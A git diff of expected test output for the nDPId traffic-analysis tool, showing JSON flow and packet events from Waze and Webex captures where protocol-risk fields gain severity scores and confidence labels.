+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":23,"flow_first_seen":1435587871918,"flow_last_seen":1435587874945,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1368,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":285,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51049,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1435587871929,"flow_last_seen":1435587874378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":4561,"flow_avg_l4_payload_len":253,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51050,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1435587871935,"flow_last_seen":1435587874495,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2111,"flow_tot_l4_payload_len":6561,"flow_avg_l4_payload_len":312,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.103.105","src_port":51051,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880578,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":41823,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880576,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00601{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00637{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00562{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880583,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60574,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00695{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4":"Binary application transfer"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00804{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1435587867755,"flow_last_seen":1435587873026,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":11779,"flow_tot_l4_payload_len":61187,"flow_avg_l4_payload_len":1653,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"65.39.128.135","src_port":54915,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880577,"flow_last_seen":1435587880583,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":46473,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00584{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS","breed":"Safe","category":"Web"}}
+00620{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}}
 00563{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880589,"flow_last_seen":1435587880590,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.160.4.49","src_port":60479,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00636{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NTP","breed":"Acceptable","category":"System"}}
-00605{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1435587867443,"flow_last_seen":1435587867753,"flow_idle_time":180000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"200.89.75.198","src_port":46214,"dst_port":123,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NTP","breed":"Acceptable","category":"System"}}
+00641{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00566{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880581,"flow_last_seen":1435587880589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52746,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1435587866603,"flow_last_seen":1435587898628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":15,"midstream":1,"ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"174.37.231.81","src_port":42256,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","total-events-serialized":221}
+00155{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","total-events-serialized":228}
 ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
 ~~ packets captured/processed: 597/597
 ~~ skipped flows.............: 0
 ~~ total layer4 data length..: 326183 bytes
-~~ total detected protocols..: 22
+~~ total detected protocols..: 23
 ~~ total active/idle flows...: 33/33
 ~~ total timeout flows.......: 0
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-~~ total memory allocated....: 4726088 bytes
-~~ total memory freed........: 4726088 bytes
-~~ total allocations/frees...: 100328/100328
+~~ total memory allocated....: 4800545 bytes
+~~ total memory freed........: 4800545 bytes
+~~ total allocations/frees...: 101918/101918
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ~~ json string min len.......: 160 chars
-~~ json string max len.......: 1162 chars
-~~ json string avg len.......: 731 chars
+~~ json string max len.......: 1348 chars
+~~ json string avg len.......: 824 chars
diff --git a/test/results/webex.pcap.out b/test/results/webex.pcap.out
index d39b11da1..1cf221296 100644
--- a/test/results/webex.pcap.out
+++ b/test/results/webex.pcap.out
@@ -3,14 +3,14 @@
 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1444570624853,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570624853,"pkt":"ABoRAAACABoRAAABCABFAAA8OXNAAEAGTZUKCAABQERpZ6GCAbtPGIcMAAAAAKACOQgjFwAAAgQFtAQCCAoATL5\/AAAAAAEDAwY="}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoAQ5AABAGtg5ARGlnCggAAQG7oYKw53jzTxiHDVAS\/\/9Y4AAA"}
 00439{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570624860,"pkt":"ABoRAAACABoRAAABCABFAAAoOXRAAEAGTagKCAABQERpZ6GCAbtPGIcNsOd49FAQOQgf2QAA"}
-00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
-01195{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
+00947{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570624853,"flow_last_seen":1444570624860,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":48,"midstream":0,"ts_msec":1444570624860,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+01301{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"webex.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570624853,"flow_last_seen":1444570625424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2720,"flow_tot_l4_payload_len":4134,"flow_avg_l4_payload_len":516,"midstream":0,"ts_msec":1444570625424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41346,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","server_names":"*.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"c253ec3ad88e42f8da4032682892f9a0","unsafe_cipher":2,"cipher":"TLS_RSA_WITH_RC4_128_MD5","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}}
 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570627404,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1444570627404,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1444570627404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1444570627404,"pkt":"ABoRAAACABoRAAABCABFAAA8hnNAAEAGAJUKCAABQERpZ6GEAbuwMDkNAAAAAKACOQgO\/QAAAgQFtAQCCAoATL9+AAAAAAEDAwY="}
 00442{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1444570627409,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570627409,"pkt":"ABoRAAACABoRAAABCABFAAAoASZAABAGtfZARGlnCggAAQG7oYRPz8bysDA5DlAS\/\/9Y3gAA"}
 00441{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1444570627410,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1444570627410,"pkt":"ABoRAAACABoRAAABCABFAAAohnRAAEAGAKgKCAABQERpZ6GEAbuwMDkOT8\/G81AQOQgf1wAA"}
-00842{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"webex.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570627404,"flow_last_seen":1444570627411,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":56,"midstream":0,"ts_msec":1444570627411,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.105.103","src_port":41348,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1.2","client_requested_server_name":"radcom.webex.com","ja3":"f9010d8c34749bdf7659b52227e6f91b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
